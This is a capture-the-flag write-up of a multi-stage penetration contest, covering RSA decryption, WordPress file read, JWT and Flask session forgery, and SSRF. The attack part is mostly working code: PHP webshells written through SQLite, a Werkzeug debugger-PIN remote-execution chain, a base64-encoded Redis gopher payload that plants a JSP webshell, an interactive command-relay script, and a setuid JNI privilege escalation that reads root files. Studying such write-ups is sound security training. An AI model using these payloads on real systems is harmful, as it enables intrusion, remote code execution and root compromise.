2025 New Year's Day Penetration Contest Writeup - ctfshow

2025 ctfshow New Year's Day penetration contest

If the images are broken, go to my blog 👇

https://ddl08.github.io/

All references are given at the end of the article

Chapter 1

flag1 - the archive

Brute-force the archive password

flag2 - image - password

The archive contains an image

PNG file trailer identifier (the IEND chunk and its CRC)

49 45 4E 44 AE 42 60 82
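The trailer quoted above is where the hidden data starts. As an added example (not part of the writeup), the following parser walks the PNG chunk list, stops at IEND, and returns whatever was glued on after it, so the appended payload can be carved out and verified instead of eyeballed in a hex editor. The sample image and the appended base64 blob are constructed inline.

```python
import base64
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
IEND_TRAILER = bytes.fromhex("49454E44AE426082")  # "IEND" + its fixed CRC, as quoted above

def make_chunk(ctype, body):
    """Build one PNG chunk: big-endian length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def png_chunks(data):
    """Walk the chunk list; return (list of (type, length, crc_ok), offset just past IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        chunks.append((ctype.decode("latin-1"), length, zlib.crc32(ctype + body) & 0xFFFFFFFF == crc))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, pos          # everything past here is not part of the image
    raise ValueError("no IEND chunk found")

def trailing_data(data):
    """Bytes appended after IEND; a clean PNG returns b''."""
    return data[png_chunks(data)[1]:]

# constructed sample: a valid 1x1 grayscale PNG with a base64 blob glued on after IEND
CLEAN_PNG = (PNG_SIG
             + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
             + make_chunk(b"IEND", b""))
HIDDEN = base64.b64encode(b"if __name__ == '__main__':\n    pass\n")
STEGO_PNG = CLEAN_PNG + HIDDEN

if __name__ == "__main__":
    extra = trailing_data(STEGO_PNG)
    print("bytes after IEND:", len(extra))
    print(base64.b64decode(extra).decode())
```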

Extract the extra data appended after the trailer and base64-decode it 👇, which gives this

if __name__ == '__main__':
    try:
        import secretMessageResponse
    except ImportError:
        import pip
        pip.main(['install', 'secretMessageResponse'])
        from secretMessageResponse import printMessage

Ran it with Python; nothing useful came out, just a pile of data

Go look for the library 👇

pip show secretMessageResponse

Crypto environment problem

from Crypto.PublicKey import RSA fails with ModuleNotFoundError: No module named 'Crypto'. Fix:
(1) Install pycryptodome: pip install pycryptodome. If crypto or pycrypto already exist in site-packages, run pip uninstall crypto and pip uninstall pycrypto before installing, otherwise the install fails.
(2) After installation, rename the crypto folder in site-packages so that its first letter is a capital C.

Deriving the private key

from Crypto.PublicKey import RSA
p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n = 633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417
e = 0x10001
# compute the remaining RSA parameters from the recovered factors
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
# build the private key and export it as PEM
key = RSA.construct((n, e, d, p, q))
private_key = key.export_key()
print(private_key.decode('utf-8'))

Extracting the public key parameters

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
# the PEM public key supplied with the package
pem_key = b"""
-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----
"""
# load the public key from the PEM data
public_key = serialization.load_pem_public_key(
    pem_key,
    backend=default_backend()
)
# extract the modulus n and the public exponent e
n = public_key.public_numbers().n
e = public_key.public_numbers().e
print("模数(n):", n)
print("公钥指数(e):", e)

Decryption script

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
message = {
    "inputMessage_20241216" :'''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''',
    "inputMessage_20240411" : '''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''',
    "inputMessage_20240305" : '''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''',
}
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse
import base64
p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n = p * q
e = 0x10001
d = inverse(e,(p - 1) * (q - 1))
priv = RSA.construct((n, e, d, p, q))

# hand the reconstructed key to cryptography as PEM
private_key = serialization.load_pem_private_key(priv.export_key('PEM'), password=None, backend=default_backend())
for name, value in message.items():
    encrypted = base64.b64decode(value)
    plaintext = private_key.decrypt(
        encrypted,
        padding.OAEP(
            mgf=padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None
        )
    )
    # the OAEP plaintext is itself base64 text
    print(base64.b64decode(plaintext).decode())

Output

Park:
你的行动已经暴露,24小时内迅速撤离,销毁所有资料,将现有资料统一上传到【任务中心】
发送人:Dylan
Park:
总部已经为你安排新的身份,请务必在3日内抵台,你的新身份是新竹县动物保护防疫所网络安全顾问,【任务中心】账号密码和你任职单位网站的数据库用户名密码一致,请尽快修改
发送人:Dylan
Park:
【任务中心】网址已变更为 https://task.ctfer.com ,请注意修改浏览器地址栏中的链接
发送人:Dylan

flag3 - WordPress vulnerability + base account

This is where it suddenly gets fun

Get the account credentials following the hint from flag2

Query the database for the corresponding site; the page source shows it runs WordPress,

Scan it and look it up

https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b/

Vulnerability verification

?aam-media=wp-config.php
ctfshow{hsinchug_wp1_Q.4Vyj8VCiedX1KYU5g05}

Chapter 2

flag4 - JWT forgery + second account

The phone-number lookup can be captured in a proxy; per the hint it is a JWT, and the key is in the campfire (image)

4a4f7d6e8b5 ?0c7f

4a4f7d6e8b5e3a0c7f

Brute force

hashcat -a 3 -m 16500 hash.txt --custom-charset1=?l?d 4a4f7d6e8b5?1?1?10c7f

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoc2luY2h1Z193cDEiLCJleHAiOjE3MzY3NzIyNTV9._fw255qGHn4l9BtB6Uw2AifVgb9Z5xd7Grl41Q7S7LU

Result

ctfshow{117447685307}

flag5 - file read + root account + app.py.bak (contains the password)

Use the new identity to look at the new admin functions and capture the requests: one lists files, the other reads a file

Reading init_users.json gives the flag

ctfshow{7y.(sc#Ac_}

flag6 - SSRF + secret_key

The Server Info menu reveals an internal IP address

There is a download task file page that can be used to try reaching the intranet

ctfshow{0x8F7C71E8E82E4D1E}

Chapter 3

flag7 - SSRF to upload a webshell and get a shell

Writing the webshell through SQLite

?dsn=sqlite:shell.php&username=aaa&password=bbb&query=create table "aaa"(name TEXT DEFAULT "<?php file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");

That did not work; the following was used instead

http://172.2.198.5/?username=1%26password=1%26query=CREATE TABLE users (name TEXT);%26dsn=sqlite:b.php
http://172.2.198.5/?username=1%26password=1%26query=INSERT INTO users (name) VALUES ('<?php file_put_contents("4.php","<?php system(\$_GET[0]);?>");?>');%26dsn=sqlite:b.php
http://172.2.198.5/b.php
http://172.2.198.5/4.php?0=ls;
http://172.2.198.5/4.php?0=cat config.php;
Method 2

Original payload

%3fdsn=sqlite:shell.php%26username=aaa%26password=bbb%26query=create%20table%20"aaa"%20(name%20TEXT%20DEFAULT%20"<?php%20file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");

What was submitted

http://172.2.198.5/%3fdsn=sqlite:shell.php%26username=bbb%26password=bbb%26query=create%20table%20%22bbb%22%20(name%20TEXT%20DEFAULT%20%22%3C?php%20file_put_contents(%271.php%27,%27%3C?php%20eval($_GET[1]);?%3E%27);?%3E%22);

Then visit shell.php; it throws an error, but the shell has been written, so go to 1.php

flag8 - just look

There is a secret.txt in the root directory; it contains the base64 of an email account and password

Logging in to the NetEase mailbox shows 81192

Chapter 4

flag9 - session forgery - SSRF + key

Hitting .6:8888 hands you a session; /key is refused, so forge one

Forge it from the source in the py.bak found at flag5

python flask_session_cookie_manager3.py decode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -c eyJ1c2VyIjoiZ3Vlc3QifQ.Z4dF3w.FEE9qzWhV0dbFQ-ZNfYo7eqpr6o
python flask_session_cookie_manager3.py encode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -t "{'user': 'admin'}"
eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY

Then SSRF through the shell obtained earlier

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/key"

flag10 - Flask log file getshell

Approach
  • Read the werkzeug source

    • werkzeug is the Python library that implements the WSGI specification.

    • WSGI is the interface specification between a web server and a Python web application

  • curl

    • -v enables verbose mode

    • -c cookie.txt

      • tells curl to save the cookies returned by the server to cookie.txt once the request completes.

    • -b

      • tells curl to send the given cookie file (or cookie string) with the request.

Procedure
Method 3

Script attached

import base64
import requests
import urllib.parse

while True:
    data = input("> ")
    # data = urllib.parse.quote(data)
    # python_shell = 'curl --cookie "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z3kddg.CjbNhdNFa_7H--igibxBzM2omNk;__wzd2fb5743f98b45463400e=1736152460|4bfc86e353c8" "http://172.2.252.6:8888/console?__debugger__=yes&s=eABh7cMeNgMKri1DSi4w&cmd={}&frm=1"'.format(data)
    # python_shell = base64.b64encode(python_shell.encode()).decode()
    data = base64.b64encode(data.encode()).decode()
    # normal_shell = 'echo "' + data + '" | base64 -d | sh'
    normal_shell=data
    # url = "https://543f943e-6f90-43b4-bfc8-ee86d2fb3f34.challenge.ctf.show/downloadTaskFile?url=http://172.2.239.5/1.php?1=phpinfo();"
    url = "http://6bcb3e8b-f3e3-4103-86b7-e8d9a9df8f92.challenge.ctf.show/downloadTaskFile?url=http://172.2.198.5/1.php?1=system(base64_decode(\""+normal_shell+"\"));"
    response = requests.get(url, verify=False, headers={'Authorization': "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJkeWxhbiIsImV4cCI6MTczNzAwNTIwOH0.6I2CU7u2c96zkz_HhdEg2NvuvwdvLSsAjfIom3b80Jw"})
    try:
        # print(url)
        # print(response.json())
        # print(response.json()["url"])
        print(response.json()["file_content"])
    except (ValueError, KeyError):
        # non-JSON body or no file_content field: the relayed request failed
        print("Error")

Change the log settings

/set_log_option%3flogName=werkzeug%2526logFile=main.log

Get the console password

/console

21hr1yWBaAg5kQrHGHW

Write

curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl"

View

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"

Get the PIN

/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl
143-535-858

Verify

curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"

Save the cookie

curl -c cookie.txt -v -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"

Execute commands with the cookie

curl -v -b  "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=__import__('os').system('''cat%20\/etc\/passwd>.\/log\/main2.log''')&frm=0&s=21hr1yWBaAg5kQrHGHWl"

Nothing was written; switch to the other shell

http://172.2.198.5/1.php?1=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDgwNWJkYTg2MDM3ODdhMTI0MmNkPTE3MzY5MjY0MDJ8MTJhMzJjOTc4YTI2IiAiaHR0cDovLzE3Mi4yLjE5OC42Ojg4ODgvY29uc29sZT9fX2RlYnVnZ2VyX189eWVzJmNtZD1vcy5zeXN0ZW0oJycnY2F0JTIwXC9ldGNcL3Bhc3N3ZD4uXC9sb2dcL21haW4yLmxvZycnJykmZnJtPTAmcz0yMWhyMXlXQmFBZzVrUXJIR0hXbCI='));
http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main2.log"

Read

http://172.2.198.5/4.php?0=curl -b  "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"

Read directly

 curl -v -b  "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=21hr1yWBaAg5kQrHGHWl"

Chapter 5

flag11

Directly accessing port 8080 on .7 shows a Jetty server

  1. Sensitive file read

    • curl  -v  "http://172.2.198.7:8080/%u002e/WEB-INF/web.xml"
    • It reads straight out

flag12

  1. Authenticate first

    1. http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJkaWN0Oi8vMTcyLjIuMTgyLjc6NjM4MC9hdXRoOmN0ZnNob3dfMjAyNSI='));
    2. curl  -v  "dict://172.2.182.7:6380/auth:ctfshow_2025"
  2. Then upload the webshell

    1. http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJnb3BoZXI6Ly8xNzIuMi4xODIuNzo2MzgwL19hdXRoJTIwY3Rmc2hvd18yMDI1JTBBc2V0JTIwbWFycyUyMCUyMiUzQyUyNSUyMFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3JTIwU3RyaW5nJTVCJTVEJTdCJTVDJTIyc2glNUMlMjIlMkMlNUMlMjItYyU1QyUyMiUyQ3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCU1QyUyMmNtZCU1QyUyMiklN0QpJTNCJTI1JTNFJTIyJTBBY29uZmlnJTIwc2V0JTIwZGlyJTIwJTJGb3B0JTJGamV0dHklMkZ3ZWJhcHBzJTJGUk9PVCUyRiUwQWNvbmZpZyUyMHNldCUyMGRiZmlsZW5hbWUlMjAyLmpzcCUwQXNhdmUlMEFxdWl0Ig=='));
  3. Read files

    1. The command has no output echo, so write the output into the web root /opt/jetty/webapps/ROOT/

    2. 2.jsp?cmd=ls%20/>/opt/jetty/webapps/ROOT/success.txt
    3. 2.jsp?cmd=cat%20/dylan.txt>/opt/jetty/webapps/ROOT/success.txt

flag13

  1. Check file capabilities

    1. getcap%20-r%20/%202>/dev/null>/opt/jetty/webapps/ROOT/success.txt
    2. /usr/local/openjdk-8/bin/java = cap_setuid+ep
  2. setuid privilege escalation

  3. Write SetUID.c

    1. 2.jsp?cmd=echo%20"I2luY2x1ZGUgPGpuaS5oPgovLzExMTExMTExMTExMjIKI2luY2x1ZGUgPHVuaXN0ZC5oPgoKSk5JRVhQT1JUIGppbnQgSk5JQ0FMTCBKYXZhX1NldFVJRF9zZXRVSUQoSk5JRW52ICplbnYsIGpvYmplY3Qgb2JqLCBqaW50IHVpZCkgewogICAgcmV0dXJuIHNldHVpZCh1aWQpOwp9"%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.c
    2. #include <jni.h>
      #include <unistd.h>
      
      JNIEXPORT jint JNICALL Java_SetUID_setUID(JNIEnv *env, jobject obj, jint uid) {
          return setuid(uid);
      }
  4. SetUID.java

    1. 2.jsp?cmd=echo%20"cHVibGljIGNsYXNzIFNldFVJRCB7CiAgICBzdGF0aWMgewogICAgICAgIFN5c3RlbS5sb2FkTGlicmFyeSgiU2V0VUlEIik7IAogICAgfQoKICAgIHB1YmxpYyBuYXRpdmUgaW50IHNldFVJRChpbnQgdWlkKTsgCiAgLy9hCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTZXRVSUQgc2V0VUlEID0gbmV3IFNldFVJRCgpOwogICAgICAgIGludCByZXN1bHQgPSBzZXRVSUQuc2V0VUlEKDApOyAKICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKG5ldyBTdHJpbmdbXXsic2giLCItYyIsImNhdCAvcm9vdC8qLnR4dD4vb3B0L2pldHR5L3dlYmFwcHMvUk9PVC9yb290LnR4dCJ9KTsKICAgIH0KfQ=="%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.java
    2. public class SetUID {
          static {
              System.loadLibrary("SetUID"); 
          }
      
          public native int setUID(int uid); 
      
          public static void main(String[] args) throws Exception {
              SetUID setUID = new SetUID();
              int result = setUID.setUID(0); 
              Runtime.getRuntime().exec(new String[]{"sh","-c","cat /root/*.txt>/opt/jetty/webapps/ROOT/root.txt"});
          }
      }
  5. Compile

    1. 2.jsp?cmd=javac%20/opt/jetty/webapps/ROOT/SetUID.java
    2. 2.jsp?cmd=gcc%20-shared%20-fPIC%20-o%20/opt/jetty/webapps/ROOT/libSetUID.so%20-I${JAVA_HOME}/include%20-I${JAVA_HOME}/include/linux%20/opt/jetty/webapps/ROOT/SetUID.c
  6. Run

    1. 2.jsp?cmd=java%20-Djava.library.path=/opt/jetty/webapps/ROOT/%20-cp%20/opt/jetty/webapps/ROOT/%20SetUID
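The whole of flag13 rests on one line of getcap output: an interpreter that can run arbitrary code carrying cap_setuid is root-equivalent. As an added example that is not part of the writeup, the audit below decodes the raw security.capability xattr the kernel stores (the vfs_cap_data layout), renders it the way getcap does, and flags root-equivalent capabilities; audit_tree walks a filesystem on Linux, and JAVA_XATTR is a constructed sample of what the writeup's java = cap_setuid+ep looks like on disk.

```python
import os
import struct

# on-disk layout of the security.capability xattr (struct vfs_cap_data in the kernel headers)
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000       # 20 bytes: magic + 2 x (permitted, inheritable) u32 pairs
VFS_CAP_REVISION_3 = 0x03000000       # 24 bytes: the same plus a rootid for user namespaces
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001  # set in the magic word when the 'e' flag is on
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap",
             10: "cap_net_bind_service", 19: "cap_sys_ptrace", 21: "cap_sys_admin"}
# any of these on an interpreter, or on a binary that runs user-supplied code, is root-equivalent
ROOT_EQUIVALENT = {"cap_dac_override", "cap_setgid", "cap_setuid",
                   "cap_setpcap", "cap_sys_ptrace", "cap_sys_admin"}

def parse_vfs_cap(blob):
    """Decode a raw security.capability value into its capability sets."""
    (magic,) = struct.unpack_from("<I", blob, 0)
    rev = magic & VFS_CAP_REVISION_MASK
    if rev not in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        raise ValueError("unsupported xattr revision 0x%08x" % rev)
    p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<IIII", blob, 4)
    return {"permitted": p_lo | (p_hi << 32),
            "inheritable": i_lo | (i_hi << 32),
            "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
            "rootid": struct.unpack_from("<I", blob, 20)[0] if rev == VFS_CAP_REVISION_3 else 0}

def cap_names(bits):
    return [CAP_NAMES.get(b, "cap_%d" % b) for b in range(64) if bits >> b & 1]

def cap_text(caps):  # renders like getcap for the usual case, e.g. 'cap_setuid+ep'
    flags = ("e" if caps["effective"] else "") + ("i" if caps["inheritable"] else "") + "p"
    return ",".join(cap_names(caps["permitted"])) + "+" + flags

def risky_caps(caps):  # root-equivalent capabilities the file carries in either set
    return sorted(set(cap_names(caps["permitted"] | caps["inheritable"])) & ROOT_EQUIVALENT)

def audit_tree(root="/"):
    """Linux only: list every file under root that carries a root-equivalent capability."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except (OSError, AttributeError):  # no xattr on this file, unreadable, or not Linux
                continue
            caps = parse_vfs_cap(blob)
            if risky_caps(caps):
                findings.append((path, cap_text(caps)))
    return findings

# constructed sample: the xattr the kernel stores for the writeup's 'java = cap_setuid+ep'
JAVA_XATTR = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0)
```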

References

https://chenxi9981.github.io/ctfshow_%E5%85%83%E6%97%A6%E6%9D%AF/
https://www.cnblogs.com/LAMENTXU/articles/
https://ysynrh77rj.feishu.cn/docx/F3nJdGJHjo1DSBx8c2TcecLrnvh

Assessment

Pretty hard; I don't think I could have solved it on my own,

The confusing parts are flag10 and flag13; 13 I genuinely don't understand, so I'll remember the payload and use it directly next time
